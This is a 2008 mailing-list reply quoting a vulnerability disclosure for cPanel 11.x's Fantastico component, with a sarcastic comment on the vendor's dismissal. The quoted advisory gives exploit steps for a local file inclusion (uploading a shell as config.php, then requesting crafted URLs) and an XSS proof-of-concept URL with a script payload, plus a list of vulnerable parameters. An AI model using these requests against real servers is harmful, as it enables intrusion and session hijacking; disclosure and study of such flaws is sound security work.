Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani
On Friday 31 October 2008 15:03:55 irancrash@xxxxxxxxx wrote:
> ----------------------------------------------------------------
>
> Script : Cpanel 11.x
>
> Type : Local File Inclusion & Cross Site Scripting
>
> Risk : High
>
> ----------------------------------------------------------------
>
> Discovered by : Khashayar Fereidani
>
> **** I am 17 Years Old ****
Happy birthday to you.
>
> My Official Website : HTTP://FEREIDANI.IR
>
> Team Website : Http://IRCRASH.COM
>
> Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
>
> Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
>
> ----------------------------------------------------------------
>
> Local File Inclusion Vulnerability :
>
> Note : Rename your shell to config.php and upload with your ftp account in
> ./ directory .... , now login in cpanel and enter vulnerable address in url
> ....
>
>
> https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra
>de.php?action=GoAhead&scriptpath_show=/home/[youruser]/
>
> https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgra
>de.php?action=GoAhead&scriptpath_show=/home/[youruser]/
>
> https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrad
>e.php?action=GoAhead&scriptpath_show=/home/[youruser]/
According to netenberg.com there is no prospect of privilege escalation here.
On their forum http://www.netenberg.com/forum/index.php?topic=6832 they say:
>> I do not see any reason as to why anyone would do this as they can already
>> do the same via cPanel/SSH (this exploit will only work on the cPanel
>> account of the person who wishes to use it; he/she cannot affect any other
>> account on the server).
I guess they feel similarly about the cross-site scripting. You can start
embedding those links in spam to your administrator now.
> ----------------------------------------------------------------
>
> Cross site scripting :
>
> File Address :
> frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%
>20to%201.7.4
>
> Set Action as Upgrade%20to%201.7.4
>
> Vulnerable Variables :
>
> $localapp
> $updatedir
> $scriptpath_show
> $domain_show
> $thispage
> $thisapp
> $currentversion
>
> For Example :
> https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra
>de.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%
>3C/script%3E